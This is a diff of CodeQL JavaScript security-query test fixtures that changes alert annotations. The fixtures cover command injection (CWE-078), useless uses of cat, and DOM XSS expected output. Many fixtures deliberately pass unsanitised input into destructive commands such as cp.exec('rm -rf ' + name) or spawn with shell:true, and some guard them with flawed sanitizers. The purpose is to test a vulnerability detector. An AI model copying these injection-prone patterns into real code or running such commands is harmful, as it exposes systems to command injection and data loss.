cp.exec("rm -rf " + obj.version); // OK + cp.exec("rm -rf " + obj.version); } module.exports.Foo = class Foo { - start(opts) { - cp.exec("rm -rf " + opts.bla); // NOT OK + start(opts) { // $ Source + cp.exec("rm -rf " + opts.bla); // $ Alert Sink this.opts = {}; this.opts.bla = opts.bla - cp.exec("rm -rf " + this.opts.bla); // NOT OK + cp.exec("rm -rf " + this.opts.bla); // $ Alert Sink } } @@ -304,25 +304,25 @@ function sanitizeShellString(str) { return result } -module.exports.sanitizer2 = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.sanitizer2 = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink var sanitized = sanitizeShellString(name); - cp.exec("rm -rf " + sanitized); // OK + cp.exec("rm -rf " + sanitized); } -module.exports.typeofcheck = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.typeofcheck = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (typeof name === "undefined") { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } else { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } } -module.exports.typeofcheck = function (arg) { - var cmd = "MyWindowCommand | findstr /i /c:" + arg; // NOT OK +module.exports.typeofcheck = function (arg) { // $ Source + var cmd = "MyWindowCommand | findstr /i /c:" + arg; // $ Alert Sink cp.exec(cmd); } @@ -333,22 +333,22 @@ function id(x) { module.exports.id = id; module.exports.unproblematic = function() { - cp.exec("rm -rf " + id("test")); // OK + cp.exec("rm -rf " + id("test")); }; -module.exports.problematic = function(n) { - cp.exec("rm -rf " + id(n)); // NOT OK +module.exports.problematic = function(n) { // $ Source + cp.exec("rm -rf " + id(n)); // $ Alert Sink }; module.exports.typeofNumber = function(n) { if (typeof n === "number") { - cp.exec("rm -rf " + n); // OK + cp.exec("rm -rf " + n); } }; -function boundProblem(safe, unsafe) { - cp.exec("rm -rf " + safe); // OK - cp.exec("rm -rf " + unsafe); // NOT OK +function boundProblem(safe, unsafe) { // $ Source + cp.exec("rm -rf " + safe); + cp.exec("rm -rf " + unsafe); // $ Alert Sink } Object.defineProperty(module.exports, "boundProblem", { @@ -363,8 +363,8 @@ function MyTrainer(opts) { MyTrainer.prototype = { train: function() { - var command = "learn " + this.learn_args + " " + model; // NOT OK - cp.exec(command); + var command = "learn " + this.learn_args + " " + model; // $ MISSING: Alert - lack of local field step + cp.exec(command); } }; module.exports.MyTrainer = MyTrainer; @@ -402,30 +402,30 @@ function yetAnohterSanitizer(str) { return result; } -module.exports.sanitizer3 = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.sanitizer3 = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink var sanitized = yetAnohterSanitizer(name); - cp.exec("rm -rf " + sanitized); // OK + cp.exec("rm -rf " + sanitized); } const cp = require("child_process"); const spawn = cp.spawn; -module.exports.shellOption = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.shellOption = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - cp.execFile("rm", ["-rf", name], {shell: true}, (err, out) => {}); // NOT OK - cp.spawn("rm", ["-rf", name], {shell: true}); // NOT OK - cp.execFileSync("rm", ["-rf", name], {shell: true}); // NOT OK - cp.spawnSync("rm", ["-rf", name], {shell: true}); // NOT OK + cp.execFile("rm", ["-rf", name], {shell: true}, (err, out) => {}); // $ Alert + cp.spawn("rm", ["-rf", name], {shell: true}); // $ Alert + cp.execFileSync("rm", ["-rf", name], {shell: true}); // $ Alert + cp.spawnSync("rm", ["-rf", name], {shell: true}); // $ Alert const SPAWN_OPT = {shell: true}; - spawn("rm", ["first", name], SPAWN_OPT); // NOT OK + spawn("rm", ["first", name], SPAWN_OPT); // $ Alert var arr = []; - arr.push(name); // NOT OK - spawn("rm", arr, SPAWN_OPT); - spawn("rm", build("node", (name ? name + ':' : '') + '-'), SPAWN_OPT); // This is bad, but the alert location is down in `build`. + arr.push(name); // $ Alert + spawn("rm", arr, SPAWN_OPT); // $ Alert + spawn("rm", build("node", (name ? name + ':' : '') + '-'), SPAWN_OPT); // $ Alert } function build(first, last) { @@ -433,18 +433,18 @@ function build(first, last) { if (something() === 'gm') arr.push('convert'); first && arr.push(first); - last && arr.push(last); // NOT OK + last && arr.push(last); // $ Alert return arr; }; var asyncExec = require("async-execute"); -module.exports.asyncStuff = function (name) { - asyncExec("rm -rf " + name); // NOT OK +module.exports.asyncStuff = function (name) { // $ Source + asyncExec("rm -rf " + name); // $ Alert Sink } const myFuncs = { - myFunc: function (name) { - asyncExec("rm -rf " + name); // NOT OK + myFunc: function (name) { // $ Source + asyncExec("rm -rf " + name); // $ Alert Sink } }; @@ -474,13 +474,13 @@ const {promisify} = require('util'); const exec = promisify(require('child_process').exec); -module.exports = function check(config) { - const cmd = path.join(config.installedPath, 'myBinary -v'); // NOT OK +module.exports.check = function check(config) { // $ Source + const cmd = path.join(config.installedPath, 'myBinary -v'); // $ Alert return exec(cmd); } -module.exports.splitConcat = function (name) { - let args = ' my name is ' + name; // NOT OK +module.exports.splitConcat = function (name) { // $ Source + let args = ' my name is ' + name; // $ Alert Sink let cmd = 'echo'; cp.exec(cmd + args); } @@ -495,8 +495,8 @@ module.exports.myCommand = function (myCommand) { cp: require('child_process') }; - module.exports.myIndirectThing = function (name) { - MyThing.cp.exec("rm -rf " + name); // NOT OK + module.exports.myIndirectThing = function (name) { // $ Source + MyThing.cp.exec("rm -rf " + name); // $ Alert Sink } }); @@ -506,91 +506,91 @@ for (var name in imp){ module.exports[name] = imp[name]; } -module.exports.sanitizer4 = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.sanitizer4 = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (isNaN(name)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isNaN(parseInt(name))) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isNaN(+name)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isNaN(parseInt(name, 10))) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isNaN(name - 0)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isNaN(name | 0)) { // <- not a sanitizer - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } else { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } } -module.exports.shellThing = function (name) { +module.exports.shellThing = function (name) { // $ Source function indirectShell(cmd, args, spawnOpts) { - cp.spawn(cmd, args, spawnOpts); // NOT OK + cp.spawn(cmd, args, spawnOpts); // $ Alert } - - indirectShell("rm", ["-rf", name], {shell: true}); + + indirectShell("rm", ["-rf", name], {shell: true}); // $ Alert } -module.exports.badSanitizer = function (name) { +module.exports.badSanitizer = function (name) { // $ Source if (!name.match(/^(.|\.){1,64}$/)) { // <- bad sanitizer - exec("rm -rf " + name); // NOT OK + exec("rm -rf " + name); // $ Alert Sink } else { - exec("rm -rf " + name); // NOT OK + exec("rm -rf " + name); // $ Alert Sink } if (!name.match(/^\w{1,64}$/)) { // <- good sanitizer - exec("rm -rf " + name); // NOT OK + exec("rm -rf " + name); // $ Alert Sink } else { - exec("rm -rf " + name); // OK + exec("rm -rf " + name); } } -module.exports.safeWithBool = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.safeWithBool = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (isSafeName(name)) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink if (isSafeName(name) === true) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isSafeName(name) !== false) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isSafeName(name) == false) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } function indirectThing(name) { @@ -605,37 +605,37 @@ function moreIndirect(name) { return indirectThing2(name) !== false; } -module.exports.veryIndeirect = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.veryIndeirect = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (indirectThing(name)) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (indirectThing2(name)) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (moreIndirect(name)) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (moreIndirect(name) !== false) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } else { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } -module.exports.sanitizer = function (name) { - var sanitized = "'" + name.replace(new RegExp("\'"), "'\\''") + "'" - cp.exec("rm -rf " + sanitized); // NOT OK +module.exports.sanitizer = function (name) { // $ Source + var sanitized = "'" + name.replace(new RegExp("\'"), "'\\''") + "'" // $ Alert Sink + cp.exec("rm -rf " + sanitized); // $ Alert Sink var sanitized = "'" + name.replace(new RegExp("\'", 'g'), "'\\''") + "'" - cp.exec("rm -rf " + sanitized); // OK + cp.exec("rm -rf " + sanitized); var sanitized = "'" + name.replace(new RegExp("\'", unknownFlags()), "'\\''") + "'" - cp.exec("rm -rf " + sanitized); // OK -- Most likely should be okay and not flagged to reduce false positives. + cp.exec("rm -rf " + sanitized); // OK - Most likely should be okay and not flagged to reduce false positives. } diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js index db1ecd02413f..9c427622c770 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js @@ -1,9 +1,9 @@ var cp = require("child_process") -module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - is imported from main module. +module.exports = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - is imported from main module. }; -module.exports.foo = function (name) { - cp.exec("rm -rf " + name); // NOT OK - is imported from main module. +module.exports.foo = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - is imported from main module. }; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/other.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/other.js index b107ac03d7ae..1f512e8c3817 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/other.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/other.js @@ -1,5 +1,5 @@ var cp = require("child_process") module.exports = function (name) { - cp.exec("rm -rf " + name); // OK, is not exported to a main-module. + cp.exec("rm -rf " + name); // OK - is not exported to a main-module. }; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js index a594c2182392..e268f47c4e20 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js @@ -1,5 +1,5 @@ const cp = require("child_process"); -module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - this function is exported from `amd.js` +module.exports = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - this function is exported from `amd.js` }; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js index 6e7d3498723d..0b1abc951286 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js @@ -1,15 +1,15 @@ var cp = require("child_process") -module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - functions exported as part of a submodule are also flagged. +module.exports = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - functions exported as part of a submodule are also flagged. }; -module.exports.foo = function (name) { - cp.exec("rm -rf " + name); // NOT OK - this is being called explicitly from child_process-test.js +module.exports.foo = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - this is being called explicitly from child_process-test.js }; module.exports.amd = require("./amd.js"); -module.exports.arrToShell = function (cmd, arr) { - cp.spawn("echo", arr, {shell: true}); // NOT OK +module.exports.arrToShell = function (cmd, arr) { // $ Source + cp.spawn("echo", arr, {shell: true}); // $ Alert } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts index 1e945f15e724..e6b7a10bacf6 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts @@ -1,5 +1,5 @@ var cp = require("child_process") -export default function (name) { - cp.exec("rm -rf " + name); // NOT OK - the "files" directory points to this file. +export default function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - the "files" directory points to this file. } diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js index c46fed331815..853e144a0d62 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js @@ -1,5 +1,5 @@ var cp = require("child_process") -module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - the "files" directory points to this file. +module.exports = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - the "files" directory points to this file. }; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts index 9fa88413cc88..f28c157a5ead 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts @@ -1,5 +1,5 @@ var cp = require("child_process") -module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - functions exported as part of a submodule are also flagged. +module.exports = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - functions exported as part of a submodule are also flagged. }; diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/index.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/index.js index 820349c5c62f..505f4e7af78a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/index.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/index.js @@ -3,6 +3,6 @@ const dispatch = { POST: require("./subsub"), }; -module.exports.foo = function (name, type) { +module.exports.foo = function (name, type) { // $ Source dispatch[type](name); }; diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js index 952288a82cef..b8da58006c7c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js @@ -1,5 +1,5 @@ const cp = require("child_process") module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - functions exported as part of a submodule are also flagged. + cp.exec("rm -rf " + name); // $ Alert Sink - functions exported as part of a submodule are also flagged. }; diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/UselessUseOfCat.expected b/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/UselessUseOfCat.expected index 1a561b8fc416..820d8af4767d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/UselessUseOfCat.expected +++ b/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/UselessUseOfCat.expected @@ -78,7 +78,7 @@ options | uselesscat.js:86:1:86:75 | execFil ... utf8'}) | uselesscat.js:86:57:86:74 | {encoding: 'utf8'} | | uselesscat.js:100:1:100:56 | execFil ... ptions) | uselesscat.js:100:42:100:55 | unknownOptions | | uselesscat.js:111:1:111:51 | spawn(' ... it'] }) | uselesscat.js:111:14:111:50 | { stdio ... rit'] } | -| uselesscat.js:136:17:138:2 | execSyn ... tf8'\\n}) | uselesscat.js:136:51:138:1 | { // NO ... utf8'\\n} | +| uselesscat.js:136:17:138:2 | execSyn ... tf8'\\n}) | uselesscat.js:136:51:138:1 | { // $ ... utf8'\\n} | | uselesscat.js:147:1:147:47 | shelljs ... utf8'}) | uselesscat.js:147:29:147:46 | {encoding: 'utf8'} | | uselesscat.js:151:1:151:48 | cspawn( ... tf8' }) | uselesscat.js:151:28:151:47 | { encoding: 'utf8' } | | uselesscat.js:156:1:156:35 | cspawn( ... tf8' }) | uselesscat.js:156:15:156:34 | { encoding: 'utf8' } | diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/uselesscat.js b/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/uselesscat.js index 9654b26dec03..6e62a1655420 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/uselesscat.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/uselesscat.js @@ -7,21 +7,21 @@ var spawnSync = child_process.spawnSync; var fs = require('fs'); var app = express(); -exec("cat foo/bar", function (err, out) {}); // NOT OK +exec("cat foo/bar", function (err, out) {}); // $ Alert -exec("cat /proc/" + id + "/status", function (err, out) { // NOT OK +exec("cat /proc/" + id + "/status", function (err, out) { // $ Alert console.log(out); }); -execSync('cat /proc/cpuinfo').toString(); // NOT OK. +execSync('cat /proc/cpuinfo').toString(); // $ Alert -execSync(`cat ${newpath}`) // NOT OK +execSync(`cat ${newpath}`) // $ Alert execSync('cat package.json | wc -l'); // OK - pipes! -execSync('cat /proc/cpuinfo /foo/bar').toString(); // OK multiple files. +execSync('cat /proc/cpuinfo /foo/bar').toString(); // OK - multiple files. -execSync(`cat ${newpath} /foo/bar`).toString(); // OK multiple files. +execSync(`cat ${newpath} /foo/bar`).toString(); // OK - multiple files. exec(`cat ${newpath} | grep foo`, function (err, out) { }) // OK - pipes @@ -29,73 +29,73 @@ execSync(`cat ${newpath}`, {uid: 1000}) // OK - non trivial options exec('cat *.js | wc -l', { cwd: './' }, function (err, out) { }); // OK - wildcard and pipes -execSync(`cat foo/bar/${newpath}`); // NOT OK ("encoding" is used EXACTLY the same way in fs.readFileSync) +execSync(`cat foo/bar/${newpath}`); // $ Alert - "encoding" is used EXACTLY the same way in fs.readFileSync -execSync(`cat foo/bar/${newpath}`, {encoding: 'utf8'}); // NOT OK ("encoding" is used EXACTLY the same way in fs.readFileSync) +execSync(`cat foo/bar/${newpath}`, {encoding: 'utf8'}); // $ Alert - "encoding" is used EXACTLY the same way in fs.readFileSync -execSync("/bin/cat /proc/cpuinfo", { uid: 1000, gid: 1000, encoding: 'utf8'}); // OK (fs.readFileSync cannot emulate uid / gid)) +execSync("/bin/cat /proc/cpuinfo", { uid: 1000, gid: 1000, encoding: 'utf8'}); // OK - (fs.readFileSync cannot emulate uid / gid)) -execSync('cat /proc/cpuinfo > foo/bar/baz').toString(); // OK. +execSync('cat /proc/cpuinfo > foo/bar/baz').toString(); -execSync(`cat ${newpath} > ${destpath}`).toString(); // OK. +execSync(`cat ${newpath} > ${destpath}`).toString(); -execSync(`cat ${files.join(' ')} > ${outFile}`); // OK +execSync(`cat ${files.join(' ')} > ${outFile}`); -execSync(`cat ${files.join(' ')}`); // OK - but flagged - not just a simple file read [INCONSISTENCY] +execSync(`cat ${files.join(' ')}`); // $ SPURIOUS: Alert - not just a simple file read exec("cat /proc/cpuinfo | grep name"); // OK - pipes execSync(`cat ${newpath} | ${othertool}`); // OK - pipes function cat(file) { - return execSync('cat ' + file).toString(); // NOT OK + return execSync('cat ' + file).toString(); // $ Alert } -execSync("sh -c 'cat " + newpath + "'"); // NOT OK - but not flagged [INCONSISTENCY] +execSync("sh -c 'cat " + newpath + "'"); // $ MISSING: Alert var execFile = child_process.execFile; var execFileSync = child_process.execFileSync; -execFile('/bin/cat', [ 'pom.xml' ], function(error, stdout, stderr ) { // NOT OK +execFile('/bin/cat', [ 'pom.xml' ], function(error, stdout, stderr ) { // $ Alert // Not using stderr console.log(stdout); }); -execFile('/bin/cat', [ 'pom.xml' ], function(error, stdout, stderr ) { // OK. - stderr is used. +execFile('/bin/cat', [ 'pom.xml' ], function(error, stdout, stderr ) { // OK - stderr is used. console.log(stderr); }); -execFile('/bin/cat', [ 'pom.xml' ], {encoding: 'utf8'}, function(error, stdout, stderr ) { // NOT OK +execFile('/bin/cat', [ 'pom.xml' ], {encoding: 'utf8'}, function(error, stdout, stderr ) { // $ Alert // Not using stderr console.log(stdout); }); -execFileSync('/bin/cat', [ 'pom.xml' ], {encoding: 'utf8'}); // NOT OK +execFileSync('/bin/cat', [ 'pom.xml' ], {encoding: 'utf8'}); // $ Alert -execFileSync('/bin/cat', [ 'pom.xml' ]); // NOT OK +execFileSync('/bin/cat', [ 'pom.xml' ]); // $ Alert var opts = {encoding: 'utf8'}; -execFileSync('/bin/cat', [ 'pom.xml' ], opts); // NOT OK +execFileSync('/bin/cat', [ 'pom.xml' ], opts); // $ Alert var anOptsFileNameThatIsTooLongToBePrintedByToString = {encoding: 'utf8'}; -execFileSync('/bin/cat', [ 'pom.xml' ], anOptsFileNameThatIsTooLongToBePrintedByToString); // NOT OK +execFileSync('/bin/cat', [ 'pom.xml' ], anOptsFileNameThatIsTooLongToBePrintedByToString); // $ Alert -execFileSync('/bin/cat', [ 'pom.xml' ], {encoding: 'someEncodingValueThatIsCompletelyBogusAndTooLongForToString'}); // NOT OK +execFileSync('/bin/cat', [ 'pom.xml' ], {encoding: 'someEncodingValueThatIsCompletelyBogusAndTooLongForToString'}); // $ Alert -execFileSync('/bin/cat', [ "foo/" + newPath + "bar" ], {encoding: 'utf8'}); // NOT OK +execFileSync('/bin/cat', [ "foo/" + newPath + "bar" ], {encoding: 'utf8'}); // $ Alert -execSync('cat /proc/cpuinfo' + foo).toString(); // NOT OK. +execSync('cat /proc/cpuinfo' + foo).toString(); // $ Alert -execFileSync('/bin/cat', [ `foo/bar/${newpath}` ]); // NOT OK +execFileSync('/bin/cat', [ `foo/bar/${newpath}` ]); // $ Alert execFileSync('node', [ `foo/bar/${newpath}` ]); // OK - not a call to cat -exec("cat foo/bar", function (err, out) {}); // NOT OK +exec("cat foo/bar", function (err, out) {}); // $ Alert -exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK +exec("cat foo/bar", (err, out) => {console.log(out)}); // $ Alert -exec("cat foo/bar", (err, out) => doSomethingWith(out)); // NOT OK +exec("cat foo/bar", (err, out) => doSomethingWith(out)); // $ Alert execFileSync('/bin/cat', [ 'pom.xml' ], unknownOptions); // OK - unknown options. @@ -118,13 +118,13 @@ spawn('cat', { stdio: ['pipe', stdin, 'inherit'] }); // OK - Non trivial use. (B cat.stdout.on('end', () => res.end()); })(); -var dead = exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK +var dead = exec("cat foo/bar", (err, out) => {console.log(out)}); // $ Alert -var notDead = exec("cat foo/bar", (err, out) => {console.log(out)}); // OK +var notDead = exec("cat foo/bar", (err, out) => {console.log(out)}); console.log(notDead); (function () { - var dead = exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK + var dead = exec("cat foo/bar", (err, out) => {console.log(out)}); // $ Alert someCall( exec("cat foo/bar", (err, out) => {console.log(out)}) // OK - non-trivial use of returned proccess. @@ -133,34 +133,34 @@ console.log(notDead); return exec("cat foo/bar", (err, out) => {console.log(out)}); // OK - non-trivial use of returned proccess. })(); -const stdout2 = execSync('cat /etc/dnsmasq.conf', { // NOT OK. +const stdout2 = execSync('cat /etc/dnsmasq.conf', { // $ Alert encoding: 'utf8' }); -exec('/bin/cat', function (e, s) {}); // OK +exec('/bin/cat', function (e, s) {}); -spawn("cat") // OK +spawn("cat") var shelljs = require("shelljs"); -shelljs.exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK -shelljs.exec("cat foo/bar", {encoding: 'utf8'}); // NOT OK -shelljs.exec("cat foo/bar", {encoding: 'utf8'}, (err, out) => {console.log(out)}); // NOT OK +shelljs.exec("cat foo/bar", (err, out) => {console.log(out)}); // $ Alert +shelljs.exec("cat foo/bar", {encoding: 'utf8'}); // $ Alert +shelljs.exec("cat foo/bar", {encoding: 'utf8'}, (err, out) => {console.log(out)}); // $ Alert let cspawn = require('cross-spawn'); -cspawn('cat', ['foo/bar'], { encoding: 'utf8' }); // NOT OK -cspawn('cat', ['foo/bar'], { encoding: 'utf8' }, (err, out) => {console.log(out)}); // NOT OK -cspawn('cat', ['foo/bar'], (err, out) => {console.log(out)}); // NOT OK -cspawn('cat', ['foo/bar']); // NOT OK -cspawn('cat', (err, out) => {console.log(out)}); // OK -cspawn('cat', { encoding: 'utf8' }); // OK +cspawn('cat', ['foo/bar'], { encoding: 'utf8' }); // $ Alert +cspawn('cat', ['foo/bar'], { encoding: 'utf8' }, (err, out) => {console.log(out)}); // $ Alert +cspawn('cat', ['foo/bar'], (err, out) => {console.log(out)}); // $ Alert +cspawn('cat', ['foo/bar']); // $ Alert +cspawn('cat', (err, out) => {console.log(out)}); +cspawn('cat', { encoding: 'utf8' }); -let myResult = cspawn.sync('cat', ['foo/bar']); // NOT OK -let myResult = cspawn.sync('cat', ['foo/bar'], { encoding: 'utf8' }); // NOT OK +let myResult = cspawn.sync('cat', ['foo/bar']); // $ Alert +let myResult = cspawn.sync('cat', ['foo/bar'], { encoding: 'utf8' }); // $ Alert var execmod = require('exec'); -execmod("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK -execmod("cat foo/bar", {encoding: 'utf8'}); // NOT OK -execmod("cat foo/bar", {encoding: 'utf8'}, (err, out) => {console.log(out)}); // NOT OK +execmod("cat foo/bar", (err, out) => {console.log(out)}); // $ Alert +execmod("cat foo/bar", {encoding: 'utf8'}); // $ Alert +execmod("cat foo/bar", {encoding: 'utf8'}, (err, out) => {console.log(out)}); // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.ql b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.ql deleted file mode 100644 index 87b27a68998c..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.ql +++ /dev/null @@ -1,9 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.DomBasedXssQuery - -deprecated class ConsistencyConfig extends ConsistencyConfiguration { - ConsistencyConfig() { this = "ConsistencyConfig" } - - override DataFlow::Node getAnAlert() { DomBasedXssFlow::flow(_, result) } -} diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/Xss.expected b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/Xss.expected index eb46033824f4..7de1561f79e8 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/Xss.expected +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/Xss.expected @@ -1,657 +1,243 @@ -nodes -| addEventListener.js:1:43:1:47 | event | semmle.label | event | -| addEventListener.js:2:20:2:24 | event | semmle.label | event | -| addEventListener.js:2:20:2:29 | event.data | semmle.label | event.data | -| addEventListener.js:5:43:5:48 | data | semmle.label | data | -| addEventListener.js:5:43:5:48 | {data} | semmle.label | {data} | -| addEventListener.js:6:20:6:23 | data | semmle.label | data | -| addEventListener.js:10:21:10:25 | event | semmle.label | event | -| addEventListener.js:12:24:12:28 | event | semmle.label | event | -| 